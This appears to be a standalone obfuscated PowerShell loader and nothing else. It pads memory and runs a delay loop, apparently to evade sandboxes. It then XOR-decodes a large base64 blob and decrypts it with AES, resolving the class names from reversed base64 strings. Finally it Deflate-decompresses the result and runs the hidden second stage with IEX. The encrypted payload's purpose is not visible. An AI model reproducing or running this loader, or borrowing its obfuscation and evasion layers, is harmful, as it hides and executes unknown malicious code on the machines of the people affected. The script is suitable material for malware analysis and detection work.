$mgugrzopgqnnkgrq = (Get-Process -Id $PID | Select-Object Name,@{Name="WorkingSet";Expression={($_.ws / 1024kb)}}).WorkingSet
if ($mgugrzopgqnnkgrq -lt 250) { $prgpiqqzgovk = "a" * 300MB }
$mijmjthwqjtvpgr = 0
$qzgvhutkwm = 30000000
For ($mijmjthwqjtvpgr=0; $mijmjthwqjtvpgr -lt $qzgvhutkwm;$mijmjthwqjtvpgr++) { $mijmjthwqjtvpgr++ }
$tqmwkmoqks = [System.Text.Encoding]::UTF8.GetBytes("xmjtukytykqxw")
$vnpowuwqwxztvpjus = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("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"))
$jjmkwksyttw = [System.Text.Encoding]::UTF8.GetBytes($vnpowuwqwxztvpjus)
$zwpvsgxymyxmzwjwg = $(for ($xoxhsjoomqtjyxiht = 0; $xoxhsjoomqtjyxiht -lt $jjmkwksyttw.length; ) {
    for ($yqmkxhkrgkgv = 0; $yqmkxhkrgkgv -lt $tqmwkmoqks.length; $yqmkxhkrgkgv++) {
        $jjmkwksyttw[$xoxhsjoomqtjyxiht] -bxor $tqmwkmoqks[$yqmkxhkrgkgv]
        $xoxhsjoomqtjyxiht++
        if ($xoxhsjoomqtjyxiht -ge $jjmkwksyttw.Length) {
            $yqmkxhkrgkgv = $tqmwkmoqks.length
        }
    }
})
$zwpvsgxymyxmzwjwg = [System.Text.Encoding]::UTF8.GetString($zwpvsgxymyxmzwjwg)
$mkpkzhosvrsrv = "$zwpvsgxymyxmzwjwg"
$jgogixjkyypst = $mkpkzhosvrsrv.ToCharArray()
[array]::Reverse($jgogixjkyypst)
$yjprwokvrmot = -join($jgogixjkyypst)
$tmjwtmhzhttitr = [System.Convert]::FromBase64String("$yjprwokvrmot")
$jmwnzoqtvjgyrgrt = [System.Convert]::FromBase64String("ySryokKhbUIWzeihe+QYBORUBuCgjt19swwNRWwVPRw=")
$vxvqwyjwjjmyz = "==gCkV2Zh5WYNNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3U"
$untgkixmzvgmr = $vxvqwyjwjjmyz.ToCharArray()
[array]::Reverse($untgkixmzvgmr)
$uxsnxzuhzoqvk = -join($untgkixmzvgmr)
$oginmgpssh = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($uxsnxzuhzoqvk))
$qvuvhjrnmsiym = New-Object "$oginmgpssh"
$pzvwnkjjmhmwuh = "==gQDVkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W"
$xssrzxmpqvuwwv = $pzvwnkjjmhmwuh.ToCharArray()
[array]::Reverse($xssrzxmpqvuwwv)
$wmgkgqwgvzuokq = -join($xssrzxmpqvuwwv)
$pjjmrxotosiyyzv = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($wmgkgqwgvzuokq))
$rhhpsvuqgmhvxtnh = & ([scriptblock]::Create($pjjmrxotosiyyzv))
$qvuvhjrnmsiym.Mode = $rhhpsvuqgmhvxtnh
$ihtinpnvvzyv = "==wcvJXZapjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W"
$wgxohysqszxiwq = $ihtinpnvvzyv.ToCharArray()
[array]::Reverse($wgxohysqszxiwq)
$qoqqnhzwououpy = -join($wgxohysqszxiwq)
$kkjrqknsosxq = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($qoqqnhzwououpy))
$jpwqxgphtmomhjw = & ([scriptblock]::Create($kkjrqknsosxq))
$qvuvhjrnmsiym.Padding = $jpwqxgphtmomhjw
$qvuvhjrnmsiym.BlockSize = 128
$qvuvhjrnmsiym.KeySize = 192
$qvuvhjrnmsiym.Key = $jmwnzoqtvjgyrgrt
$qvuvhjrnmsiym.IV = $tmjwtmhzhttitr[0..15]
$mpupvxptsktugrjq = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U3lzdGVtLklPLk1lbW9yeVN0cmVhbQ=="))
$mxpkjvygypjkmkzk = New-Object $mpupvxptsktugrjq(,$qvuvhjrnmsiym.CreateDecryptor().TransformFinalBlock($tmjwtmhzhttitr,16,$tmjwtmhzhttitr.Length-16))
$gihohjrgviih = New-Object $mpupvxptsktugrjq
$ghktvugmzxgvnj = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("RGVjb21wcmVzcw=="))
$popqwvyonqrxi = & ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W0lPLkNvbXByZXNzaW9uLkNvbXByZXNzaW9uTW9kZV0="))))
$ypvwtuxsrwr = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U3lzdGVtLklPLkNvbXByZXNzaW9uLkRlZmxhdGVTdHJlYW0="))
$vokguvuggsh = New-Object $ypvwtuxsrwr $mxpkjvygypjkmkzk, ($popqwvyonqrxi::$ghktvugmzxgvnj)
$vokguvuggsh.CopyTo($gihohjrgviih)
$vokguvuggsh.Close()
$qvuvhjrnmsiym.Dispose()
$mxpkjvygypjkmkzk.Close()
$gsyjthxorzyutz = & ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W1N5c3RlbS5UZXh0LkVuY29kaW5nXQ=="))))
$ysvpttthqjuwzmsu = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("VVRGOA=="))
$yurkynkysr = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("VG9BcnJheQ=="))
$gmksutxvvgz = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("R2V0U3RyaW5n"))
$koiqjxmutw = $gsyjthxorzyutz::$ysvpttthqjuwzmsu.$gmksutxvvgz($gihohjrgviih.$yurkynkysr())
IEX($koiqjxmutw)
